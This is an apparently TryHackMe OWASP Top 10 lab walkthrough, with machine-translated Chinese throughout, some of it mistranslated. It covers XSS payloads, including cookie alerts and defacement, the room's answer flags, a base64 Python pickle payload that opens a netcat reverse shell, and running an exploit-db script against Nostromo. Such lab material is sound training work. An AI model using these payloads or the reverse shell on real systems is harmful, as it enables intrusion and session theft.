The VM attached to this task showcases DOM-Based, Reflected and Stored XSS. Deploy the machine and exploit each type!附加到此任务的VM显示了基于DOM的,反射和存储的XSS。部署机器并利用每种类型!
Ex
反应太慢了。。
Navigate to http://10.10.60.216/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
1 | <script>alert('Hello')</script> |
ThereIsMoreToXSSThanYouThink
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.
1 | <script>alert(window.location.host)</script> |
ReflectiveXss4TheWin
Now navigate to http://10.10.60.216/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.
Then add a comment and see if you can insert some of your own HTML.
HTML_T4gs
On the same page, create an alert popup box appear on the page with your document cookies.
1 | <script>alert(document.cookie)</script> |
W3LL_D0N3_LVL2
Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.
websites_can_be_easily_defaced_with_xss
1 | <script>alert(document.querySelector('#thm-title').textContent = 'I am a hacker' |
[Severity 8] Insecure Deserialization
*”Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application” (Acunetix., 2017)“不安全的挑战是一种漏洞,当不信任的数据用于滥用应用程序的逻辑时发生”(Acunetix2017)
This definition is still quite broad to say the least. Simply, insecure deserialization is replacing data processed by an application with malicious code; allowing anything from DoS (Denial of Service) to RCE (Remote Code Execution) that the attacker can use to gain a foothold in a pentesting scenario.至少可以说,这个定义仍然很广泛。简而言之,不安全的挑战正在用恶意代码的应用程序替换数据。允许从DOS(拒绝服务)到RCE(远程代码执行)的任何内容,攻击者可以在五边形的情况下使用它来获得立足点。
Specifically, this malicious code leverages the legitimate serialization and deserialization process used by web applications. We’ll be explaining this process and why it is so commonplace in modern web applications.具体而言,该恶意代码利用Web应用程序使用的合法序列化和避免的过程。我们将解释此过程以及为什么它在现代Web应用程序中如此普遍。
OWASP rank this vulnerability as 8 out of 10 because of the following reasons:OWASP由于以下原因将该漏洞排名为10分中的8个:
Low exploitability. This vulnerability is often a case-by-case basis - there is no reliable tool/framework for it. Because of its nature, attackers need to have a good understanding of the inner-workings of the ToE.-
低可利用性。这种漏洞通常是逐案的基础 - 没有可靠的工具/框架。由于其性质,攻击者需要对ToE的内部工作有很好的了解。
The exploit is only as dangerous as the attacker’s skill permits, more so, the value of the data that is exposed. For example, someone who can only cause a DoS will make the application unavailable. The business impact of this will vary on the infrastructure - some organisations will recover just fine, others, however, will not.
漏洞利用仅与攻击者的技能允许一样危险,更是如此,是暴露的数据的价值。例如,只能造成DOS的人会使该应用程序不可用。这对基础架构的业务影响将有所不同 - 一些组织将恢复正常,而另一些组织则不会。
What’s Vulnerable?什么脆弱?
At summary, ultimately, any application that stores or fetches data where there are no validations or integrity checks in place for the data queried or retained. A few examples of applications of this nature are:总而言之,最终,任何存储或获取数据的应用程序都没有进行验证或完整性检查的数据,以查询或保留的数据。这种性质应用的一些例子是:
- E-Commerce Sites
- Forums
- API’s
- Application Runtimes (Tomcat, Jenkins, Jboss, etc)
Objects
A prominent element of object-oriented programming (OOP), objects are made up of two things:面向对象的编程(OOP)的突出元素是由两件事组成的:
State- 状态
Behaviour- 行为
Simply, objects allow you to create similar lines of code without having to do the leg-work of writing the same lines of code again.简而言之,对象允许您创建相似的代码行,而无需进行再次编写相同代码行的腿部工作。
For example, a lamp would be a good object. Lamps can have different types of bulbs, this would be their state, as well as being either on/off - their behaviour!例如,灯将是一个好物体。灯可以具有不同类型的灯泡,这将是它们的状态,并且要么开/关 - 他们的行为!
Rather than having to accommodate every type of bulb and whether or not that specific lamp is on or off, you can use methods to simply alter the state and behaviour of the lamp.您可以使用方法简单地改变灯的状态和行为。
Deserialization
De(Serialization)DE(序列化)
Learning is best done through analogies最好通过类比完成学习
A Tourist approaches you in the street asking for directions. They’re looking for a local landmark and got lost. Unfortunately, English isn’t their strong point and nor do you speak their dialect either. What do you do? You draw a map of the route to the landmark because pictures cross language barriers, they were able to find the landmark. Nice! You’ve just serialised some information, where the tourist then deserialised it to find the landmark.一个旅游者在街上接近您的路线。他们正在寻找当地地标并迷路了。不幸的是,英语不是他们的强项,您也不会说他们的方言。你做什么工作?您画了通往地标的路线的地图,因为图片跨语言障碍,他们能够找到地标。好的!您刚刚序列化了一些信息,然后在这里对游客进行了典范,以找到地标。
Continued持续
Serialisation is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks for further processing or storage.序列化是将用于编程中的对象转换为更简单的,兼容的格式,以在系统或网络之间传输以进行进一步处理或存储。
Alternatively, deserialisation is the reverse of this; converting serialised information into their complex form - an object that the application will understand.另外,反序列化是逆向它。将序列化信息转换为其复杂形式 - 应用程序将理解的对象。
What does this mean?这是什么意思?
Say you have a password of “password123” from a program that needs to be stored in a database on another system. To travel across a network this string/output needs to be converted to binary. Of course, the password needs to be stored as “password123” and not its binary notation. Once this reaches the database, it is converted or deserialised back into “password123” so it can be stored.假设您的程序中有一个“密码123”的密码,该程序需要存储在另一个系统上的数据库中。要跨越网络,该字符串/输出需要转换为二进制。当然,密码需要存储为“ password123”,而不是其二进制表示法。一旦到达数据库,它就会将其转换回“ password123”,以便将其存储。
The process is best explained through diagrams:该过程最好通过图来解释:
How can we leverage this?我们如何利用这一点?
Simply, insecure deserialization occurs when data from an untrusted party (I.e. a hacker) gets executed because there is no filtering or input validation; the system assumes that the data is trustworthy and will execute it no holds barred.简而言之,当没有过滤或输入验证的情况下执行来自不信任方(即黑客)的数据时,就会发生不安全的审理。该系统假设数据是值得信赖的,并且将执行该数据没有被禁止。
Cookies
Cookies 101
Ah yes, the origin of many memes. Cookies are an essential tool for modern websites to function. Tiny pieces of data, these are created by a website and stored on the user’s computer. 啊,是的,许多模因的起源。 cookie是现代网站运行的重要工具。这些数据很小,这些数据由网站创建并存储在用户的计算机上。
You’ll see notifications like the above on most websites these days. Websites use these cookies to store user-specific behaviours like items in their shopping cart or session IDs.如今,您将在大多数网站上看到如上所述的通知。网站使用这些cookie将特定于用户的行为(例如项目)存储在购物车或会话ID中。
In the web application, we’re going to exploit, you’ll notice cookies store login information like the below! Yikes!在Web应用程序中,我们将利用,您会注意到Cookies Store登录信息如下!是的!
Whilst plaintext credentials is a vulnerability in itself, it is not insecure deserialization as we have not sent any serialized data to be executed!虽然明文凭据本身就是一个漏洞,但它并不是不安全的避免化,因为我们尚未发送任何要执行的序列化数据!
Cookies are not permanent storage solutions like databases. Some cookies such as session ID’s will clear when the browser is closed, others, however, last considerably longer. This is determined by the “Expiry” timer that is set when the cookie is created.cookies不是数据库等永久存储解决方案。一些cookie(例如Session ID)将清除浏览器何时关闭浏览器,而另一些cookie则持续更长的时间。这是由创建cookie时设置的“有效”计时器确定的。
Some cookies have additional attributes, a small list of these are below:有些cookie具有其他属性,其中一小部分如下:
Attribute属性 | Description描述 | Required?必需的? |
---|---|---|
Cookie Name | The Name of the Cookie to be set 设置的饼干名称 | Yes |
Cookie Value | Value, this can be anything plaintext or encoded 这可以是明文或编码的任何东西 | Yes |
Secure Only | If set, this cookie will only be set over HTTPS connections 如果设置,此cookie只能通过HTTPS连接设置 | No |
Expiry | Set a timestamp where the cookie will be removed from the browser 设置一个时间戳,将曲奇从浏览器中删除 | No |
Path | The cookie will only be sent if the specified URL is within the request 仅当指定的URL在请求范围内时,cookie才会发送 | No |
Creating Cookies创建cookie
Cookies can be set in various website programming languages. For example, Javascript, PHP or Python to name a few. The following web application is developed using Python’s Flask, so it is fitting to use it as an example.Cookies可以用各种网站编程语言设置。例如,JavaScript,PHP或Python列举了一些。以下Web应用程序是使用Python的Flask开发的,因此以此为例很合适。
Take the snippet below:在下面进行摘要:
Setting cookies in Flask is rather trivial. Simply, this snippet gets the current date and time, stores it within the variable “timestamp” and then stores the date and time in a cookie named “registrationTimestamp”. This is what it will look like in the browser.在Flask中设置饼干相当微不足道。简而言之,该片段获取当前日期和时间,将其存储在变量“时间戳”中,然后将日期和时间存储在名为“ registrationTimestamp”的cookie中。这就是浏览器中的样子。
It’s as simple as that.就像那样简单。
Cookies Practical
Accessing your Instance访问您的实例
In the browser of the device that you are connected to the VPN with, navigate to http://10.10.105.187. I will be detailing the steps for Firefox - you may have to research how to inspect cookies in the browser of your choice. You will be greeted with the home page:在您连接到VPN的设备的浏览器中,导航到http://10.10.105.187。 我将详细介绍Firefox的步骤 - 您可能必须研究如何在您选择的浏览器中检查Cookie。您将在主页上受到欢迎:
Let’s create an account. No need to enter your TryHackMe details, you can enter what you like.让我们创建一个帐户。无需输入您的tryhackme详细信息,您可以输入自己喜欢的内容。
Where you will be directed to your profile page. Notice on the right, you have your details.您将在哪里被定向到您的个人资料页面。请注意右侧,您有您的详细信息。
Right-Click the Page and press “Inspect Element”. Navigate to the “Storage” tab.右键单击页面,然后按“ Inspect Element”。导航到“存储”选项卡。
Inspecting Encoded Data检查编码的数据
You will see here that there are cookies are both plaintext encoded and base64 encoded. The first flag will be found in one of these cookies.您会在这里看到有cookie既是纯文本编码,又要编码base64。第一个标志将在其中一个饼干中找到。
Modifying Cookie Values修改cookie值
Notice here that you have a cookie named “userType”. You are currently a user, as confirmed by your information on the “myprofile” page.请注意,您有一个名为“ UserType”的曲奇。您当前是用户,如“ MyProfile”页面上的信息所证实。
This application determines what you can and cannot see by your userType. What if you wanted to be come an admin?此应用程序确定您可以通过使用使用类型看到的东西。如果您想成为管理员怎么办?
Double left-click the “Value” column of “userType” to modify the contents. Let’s change our userType to “admin” and navigate to http://10.10.105.187/admin to answer the second flag.双击“ USERTYPE”的“值”列以修改内容。让我们将使用使用类型更改为“ Admin”,然后导航到http://10.10.105.187/admin,以回答第二个标志。
Code Execution
A much more nefarious attack than simply decoding cookies, we get into the nitty-gritty.我们更邪恶的攻击比简单地解码饼干了,我们进入了nitty-gritty。
Setup设置
- First, change the value of the userType cookie from “admin” to “user” and return to http://10.10.68.107/myprofile 1。首先,将USERTYPE cookie的值从“ admin”更改为“用户”,然后返回http://10.10.68.107/myprofile
- Then, left-click on the URL in “Exhange your vim” found in the screenshot below.2。然后,在下面的屏幕截图中发现的“振奋您的VIM”中的URL上左键单击。
- Once you have done this, left-click on the URL in “Provide your feedback!” where you will be direct to page like so:3。完成此操作后,左键单击“提供您的反馈!”中的URL。您将在哪里直接进入页面:
.**What makes this form vulnerable?**是什么使这种形式变得脆弱?
If a user was to enter their feedback, the data will get encoded and sent to the Flask application (presumably for storage within a database for example). However, the application assumes that any data encoded is trustworthy. But we’re hackers. You can only trust us as far as you can fling us (and that’s nigh-on impossible online)如果用户要输入反馈,则数据将被编码并发送到Flask应用程序(例如,用于在数据库中存储)。但是,该应用程序假定编码的任何数据都是值得信赖的。但是我们是黑客。您只能尽可能信任我们(这是在网上几乎不可能的)
Although explaining programming is a bit out of scope for this room, it’s important to understand what’s going on in the snippet below:尽管解释编程在此范围上有点超出范围,但重要的是要了解下面的摘要中发生了什么:
When you visit the “Exchange your vim” URL, A cookie is encoded and stored within your browser - perfect for us to modify! Once you visit the feedback form, the value of this cookie is decoded and then deserialised. Uh oh. In the snippet below, we can see how the cookie is retrieved and then deserialized via pickle.loads
当您访问“交换您的VIM” URL时,cookie被编码并存储在您的浏览器中 - 非常适合我们修改!访问反馈表格后,该曲奇的价值将被解码,然后进行后序列化。哦,哦。在下面的摘要中,我们可以看到如何检索饼干,然后通过pickle.loads进行验证。
This vulnerability exploits Python Pickle, which I have attached as reading material at the end of the room. We essentially have free reign to execute whatever we like such as a reverse shell.这个脆弱性利用了Python Pickle,我在房间尽头已将其作为阅读材料附加。本质上,我们有自由统治执行我们喜欢的一切,例如逆向外壳。
The Exploit利用
Now I’m not going to leave you hanging dry here. First, we need to set up a netcat listener on our Kali. If you are a subscriber, you can control your own in-browser TryHackMe Kali Machine.现在,我不会让你在这里悬挂。首先,我们需要在我们的Kali上设置NetCat侦听器。如果您是订户,则可以控制自己的浏览器Tryhackme Kali机器。
Because the code being deserialized is from a base64 format, we cannot just simply spawn a reverse shell. We must encode our own commands in base64 so that the malicious code will be executed. I will be detailing the steps below with provided material to do so.由于被序列化的代码来自base64格式,因此我们不能只是简单地产生反向外壳。我们必须在base64中编码自己的命令,以便将执行恶意代码。我将使用提供的材料来详细介绍下面的步骤。
Once this is complete, copy-and-paste the source code from this python file (pickelme.py) to your kali and modify the source code to replace your “YOUR_TRYHACKME_VPN_IP” with your TryHackMe VPN IP. This can be obtained via the Access page.完成此操作后,将此python文件(pickelme.py)的源代码复制到您的kali并修改源代码,以用TryHackme VPN IP替换您的“ your_tryhackme_vpn_ip”。 这可以通过访问页面获得。
- Create a python file to paste into, I have used “rce.py” for these examples:1。创建一个python文件粘贴到这些示例中,我使用了“ rce.py”:
- Paste the code from the GitHub site, replacing YOUR_TRYHACKME_VPN_IP with your TryHackMe VPN IP from the access page2。从github站点粘贴代码,用tryhackme vpn ip从访问页面替换your_tryhackme_vpn_ip
Execute “rce.py” via
python3 rce.py
3。通过python3 rce.py执行“ rce.py”Note the output of the command, it will look something similar to this:4。注意命令的输出,它看起来与此相似:
- Copy and paste everything in-between the two speech marks (‘DATA’). In my case, I will copy and paste:5。在两个语音标记(’数据’)之间复制并粘贴所有内容。就我而言,我将复制并粘贴:
gASVcgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTEuMy4yIDQ0NDQgPiAvdG1wL2aUhZRSlC4=
Yours may look slightly different, just ensure that you copy everything in-between the two speech marks 您的看起来可能会略有不同,只需确保您在两个演讲标记之间复制所有内容’’
- Paste this into the “encodedPayload” cookie in your browser:6。将其粘贴到浏览器中的“编码payload” cookie中:
- Ensure our netcat listener is still running:7.确保我们的NetCat听众仍在运行:
- Refresh the page. It will hang, refer back to your netcat listener:8。刷新页面。它将挂起,参考您的NetCat听众:
If you have performed the steps correctly, you will now have a remote shell to your instance. No privilege escalation involved, look for the flag.txt flag!如果您正确执行了步骤,则现在将有一个远程外壳。无需涉及特权升级,寻找flag.txt标志!
[Severity 9] Components With Known Vulnerabilities
Intro
Occasionally, you may find that the company/entity that you’re pen-testing is using a program that already has a well documented vulnerability.有时,您可能会发现您的笔测试的公司/实体正在使用已经有充分记录的漏洞的程序。
For example, let’s say that a company hasn’t updated their version of WordPress for a few years, and using a tool such as wpscan, you find that it’s version 4.6. Some quick research will reveal that WordPress 4.6 is vulnerable to an unauthenticated remote code execution(RCE) exploit, and even better you can find an exploit already made on exploit-db.例如,假设公司已经几年没有更新其版本的WordPress,并且使用WPSCAN等工具,您会发现它的版本为4.6。一些快速的研究将表明,WordPress 4.6容易受到未经身份验证的远程代码执行(RCE)的攻击,甚至更好,您可以找到已经对exploit-db进行的漏洞。
As you can see this would be quite devastating, because it requires very little work on the part of the attacker as often times since the vulnerability is already well known, someone else has made an exploit for the vulnerability. The situation becomes even worse when you realize, that it’s really quite easy for this to happen, if a company misses a single update for a program they use, they could be vulnerable to any number of attacks.如您所见,这将是非常毁灭性的,因为攻击者经常需要很少的工作,因为脆弱性已经众所周知,其他人已经对漏洞进行了利用。当您意识到时,情况变得更糟,如果一家公司错过了他们使用的程序的单个更新,那么这种情况确实很容易发生,那么它们可能容易受到任何数量的攻击。
Hence, why OWASP has rated this a 3(meaning high) on the prevalence scale, it is incredibly easy for a company to miss an update for an application.因此,为什么OWASP在患病率上将其评为3(含义高),公司对于一家公司来说非常容易错过应用程序的更新。
Exploit
Recall that since this is about known vulnerabilities, most of the work has already been done for us. Our main job is to find out the information of the software, and research it until we can find an exploit. Let’s go through that with an example web application.回想一下,由于这是关于已知漏洞,因此大多数工作已经为我们完成。我们的主要工作是找出软件的信息,然后对其进行研究,直到我们找到漏洞。让我们通过示例Web应用程序仔细研究一下。
Nostromo 1.9.6Nostromo 1.9.6
What do you know, this server is using the default page for the nostromo web server. Now that we have a version number and a software name, we can use exploit-db to try and find an exploit for this particular version.您知道,该服务器正在使用Nostromo Web服务器的默认页面。现在,我们有了一个版本号和软件名称,我们可以使用exploit-db尝试为此特定版本找到漏洞利用。
(Note: exploit-db is incredibly useful, and for all you beginners you’re gonna be using this a lot so it’s best to get comfortable with it)(注意:利用DB非常有用,对于所有初学者,您将使用它很多,因此最好对此感到满意)
Lucky us, the top result happens to be an exploit script. Let’s download it and try and to get code execution. Running this script on it’s own actually teaches us a very important lesson.幸运的是,最重要的结果恰好是一个利用脚本。让我们下载并尝试并获得代码执行。实际上,它自己运行此脚本实际上教会了我们一个非常重要的教训。
It may not work the first time. It helps to have an understanding of the programming language that the script is in, so that if needed you can fix any bugs or make any modifications, as quite a few scripts on exploit-db expect you to make modifications.它可能第一次不起作用。了解脚本所在的编程语言有助于您可以修复任何错误或进行任何修改,因为漏洞利用DB上的很多脚本都希望您进行修改。
Fortunately for us, the error was caused by an line that should have been commented, so it’s an easy fix.对我们来说幸运的是,错误是由本应评论的线引起的,因此很容易解决。
Fixing that, let’s try and run the program again.解决此问题,让我们尝试再次运行该程序。
Boom! We have RCE. Now it’s important to note here that most scripts will just tell you what arguments you need to provide, exploit developers will rarely make you read potentially hundreds of lines of codes just to figure out how to use the script.繁荣!我们有RCE。现在,重要的是要注意,大多数脚本只会告诉您需要提供哪些参数,利用开发人员很少会使您可能会阅读数百行代码,只是为了弄清楚如何使用脚本。
It is also worth noting that it may not always be this easy, sometimes you will just be given a version number like in this case, but other times you may need to dig through the HTML source, or even take a lucky guess on an exploit script, but realistically if it is a known vulnerability, there’s probably a way to discover what version the application is running.还值得注意的是,它可能并不总是那么容易,有时您会像在这种情况下一样给出一个版本号,但是其他时候,您可能需要浏览HTML源,甚至可以对利用脚本进行幸运的猜测,但实际上,如果它是已知的漏洞,则可能有一种发现该应用程序正在运行的版本的方法。
That’s really it, the great thing about this piece of the OWASP 10, is that the work is pretty much already done for us, we just need to do some basic research, and as a penetration tester, you’re already doing that quite a bit :).实际上,这是OWASP 10的伟大之处,这是为我们完成的,我们只需要进行一些基础研究,而作为一项渗透测试员,您已经做了很多事情:)。
Lab
The following is a vulnerable application, all information you need to exploit it can be found online. 以下是一个脆弱的应用程序,您需要利用的所有信息可以在线找到。
Note: When you find the exploit script, put all of your input in quotes, for example “id”注意:当您找到利用脚本时,将所有输入放入引号,例如“ ID”
[Severity 10] Insufficient Logging and Monitoring
When web applications are set up, every action performed by the user should be logged. Logging is important because in the event of an incident, the attackers actions can be traced. Once their actions are traced, their risk and impact can be determined. Without logging, there would be no way to tell what actions an attacker performed if they gain access to particular web applications. The bigger impacts of these include:设置Web应用程序时,应记录用户执行的每个操作。记录很重要,因为如果发生事件,可以追溯到攻击者的行动。一旦他们的行动被追踪,就可以确定它们的风险和影响。没有记录,如果攻击者可以访问特定的Web应用程序,就无法分辨他们执行的操作。这些更大的影响包括:
- regulatory damage: if an attacker has gained access to personally identifiable user information and there is no record of this, not only are users of the application affected, but the application owners may be subject to fines or more severe actions depending on regulations.监管损害:如果攻击者已获得对个人身份的用户信息的访问权,并且没有任何记录,则不仅会影响应用程序的用户,而且应用程序所有者可能会根据法规受到罚款或更严重的行动。
- risk of further attacks: without logging, the presence of an attacker may be undetected. This could allow an attacker to launch further attacks against web application owners by stealing credentials, attacking infrastructure and more.进一步攻击的风险:在不记录的情况下,攻击者的存在可能未被发现。这可以使攻击者通过窃取凭据,攻击基础架构等,对Web应用程序所有者发起进一步的攻击。
The information stored in logs should include:日志中存储的信息应包括:
- HTTP status codesHTTP状态代码
- Time Stamps时间邮票
- Usernames用户名
- API endpoints/page locationsAPI端点/页面位置
- IP addressesIP地址
These logs do have some sensitive information on them so its important to ensure that logs are stored securely and multiple copies of these logs are stored at different locations.这些日志确实对它们有一些敏感信息,因此必须确保将日志牢固存储并将这些日志的多个副本存储在不同位置。
As you may have noticed, logging is more important after a breach or incident has occurred. The ideal case is having monitoring in place to detect any suspicious activity. The aim of detecting this suspicious activity is to either stop the attacker completely or reduce the impact they’ve made if their presence has been detected much later than anticipated. Common examples of suspicious activity includes:您可能已经注意到,在发生违规或事件发生后,记录更为重要。理想的情况是进行监视以检测任何可疑活动。检测这种可疑活动的目的是使攻击者完全阻止攻击者,或者如果发现其存在的时间比预期的要晚得多。可疑活动的常见示例包括:
- multiple unauthorised attempts for a particular action (usually authentication attempts or access to unauthorised resources e.g. admin pages)多次未经授权的尝试(通常是身份验证尝试或访问未经授权的资源),例如管理页面)
- requests from anomalous IP addresses or locations: while this can indicate that someone else is trying to access a particular user’s account, it can also have a false positive rate.来自异常的IP地址或位置的请求:虽然这可以表明其他人正在尝试访问特定用户的帐户,但它也可以具有误报率。
- use of automated tools: particular automated tooling can be easily identifiable e.g. using the value of User-Agent headers or the speed of requests. This can indicate an attacker is using automated tooling.使用自动化工具:可以轻松识别特定的自动化工具,例如使用用户代理标头的值或请求速度。这可能表明攻击者正在使用自动工具。
- common payloads: in web applications, it’s common for attackers to use Cross Site Scripting (XSS) payloads. Detecting the use of these payloads can indicate the presence of someone conducting unauthorised/malicious testing on applications.常见有效载荷:在Web应用程序中,攻击者使用跨站点脚本(XSS)有效载荷很常见。检测使用这些有效载荷的使用可以表明对应用程序进行未经授权/恶意测试的人的存在。
Just detecting suspicious activity isn’t helpful. This suspicious activity needs to be rated according to the impact level. For example, certain actions will higher impact than others. These higher impact actions need to be responded to sooner thus they should raise an alarm which raises the attention of the relevant party.只是发现可疑活动无济于事。这种可疑活动需要根据影响水平进行评分。例如,某些行动将比其他行动更大。这些较高的影响动作需要更快地做出反应,因此它们应该引起警报,以引起相关方的关注。
Put this knowledge to practise by analysing this sample log file.通过分析此示例日志文件来练习这些知识。